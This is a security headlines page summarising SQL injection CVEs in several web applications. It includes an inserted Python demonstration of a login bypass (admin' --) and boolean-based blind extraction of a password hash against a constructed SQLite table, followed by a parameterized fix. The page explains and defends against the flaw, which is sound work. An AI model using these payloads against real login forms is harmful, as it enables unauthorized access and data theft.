Security Headlines: Latest CVEs

Tag: #sql

Money Transfer Management System 1.0 SQL Injection

Money Transfer Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Packet Storm
CVE-2021-28022: Help Desk Software for your company | ServiceTonic

Blind SQL injection in the login form of ServiceTonic Helpdesk software before 9.0.35937 allows an attacker to exfiltrate information via specially crafted HQL-compatible time-based SQL queries.
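The two login-form items above (the Money Transfer Management System authentication bypass and the ServiceTonic blind exfiltration) share one root cause: a login query assembled from the submitted username. The following is an added example written for this page, not code from either product. It assumes a constructed in-memory SQLite users table with made-up accounts, a vulnerable login that concatenates input into the query, and the same check with bound parameters. The blind extraction uses a boolean oracle (login succeeds or fails); a time-based variant like the one ServiceTonic describes runs the same binary search but decides true/false by timing a delay the payload introduces.

```python
import hashlib
import sqlite3

# Constructed sample data for this example; the application schema is assumed.
ADMIN_PASSWORD = "correct-horse"


def sha256_hex(text):
    """Hex SHA-256 of a string (stands in for whatever hashing the app does)."""
    return hashlib.sha256(text.encode()).hexdigest()


def make_db():
    """In-memory SQLite users table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", sha256_hex(ADMIN_PASSWORD)))
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("alice", sha256_hex("hunter2")))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the login query by string concatenation, the pattern behind the
    login-form injections above. Returns the logged-in username or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + sha256_hex(password) + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Same check with bound parameters: input can never alter the query structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, sha256_hex(password)),
    ).fetchone()
    return row[0] if row else None


def blind_extract(oracle, column, length):
    """Boolean-based blind extraction of `column` for the admin row through a
    true/false oracle, one character at a time by binary search over ASCII.
    A time-based variant uses the same loop but decides true/false by
    measuring a delay the payload introduces."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # The trailing comment drops the password clause entirely.
            payload = f"admin' AND unicode(substr({column}, {pos}, 1)) > {mid} --"
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    """Runs the bypass, the blind extraction and the fixed login; returns the results."""
    conn = make_db()

    def oracle(payload):
        return login_vulnerable(conn, payload, "anything") is not None

    return {
        "bypass_vulnerable": login_vulnerable(conn, "admin' --", "wrong"),
        "bypass_fixed": login_fixed(conn, "admin' --", "wrong"),
        "legit_fixed": login_fixed(conn, "admin", ADMIN_PASSWORD),
        "leaked_hash_prefix": blind_extract(oracle, "password", 8),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the concatenated query, `admin' --` logs in as admin with any password, and the oracle leaks the stored password hash character by character without ever seeing query results. The parameterized version returns None for the same payload because the quote and comment are passed as data, not SQL.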

CVE-2021-42077: PHP Event Calendar Lite Edition SQL Injection ≈ Packet Storm

PHP Event Calendar before 2021-09-03 allows SQL injection, as demonstrated by the /server/ajax/user_manager.php username parameter. This can be used to execute SQL statements directly on the database, allowing an adversary in some cases to completely compromise the database system. It can also be used to bypass the login form.

CVE-2021-34684: Security Information : Hitachi Incident Response Team : Hitachi

Hitachi Vantara Pentaho Business Analytics through 9.1 allows an unauthenticated user to execute arbitrary SQL queries on any Pentaho data source and thus retrieve data from the related databases, as demonstrated by an api/repos/dashboards/editor URI.

CVE-2020-22225: Phpjabbers Fundraising Script 1.0 - Pastebin.com

Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionLoadForm function.

CVE-2020-22223: Phpjabbers Fundraising Script 1.0 - Pastebin.com

Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionLoad function.

CVE-2020-22226: Phpjabbers Fundraising Script 1.0 - Pastebin.com

Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionSetAmount function.

Pentaho Business Analytics / Pentaho Business Server 9.1 SQL Injection

Pentaho allows users to create and manage Data Sources, and a user can select a Data Source when creating a Dashboard through the Pentaho User Console. When a Data Source is added, Pentaho makes an HTTP request to the dashboards editor (/pentaho/api/repos/dashboards/editor) to test the connection by executing a test SQL query. Further examination revealed that, combined with CVE-2021-31602 (an authentication bypass of the Spring APIs), this allows an unauthenticated user to execute arbitrary SQL queries on any Pentaho data source and thus retrieve data from the related databases.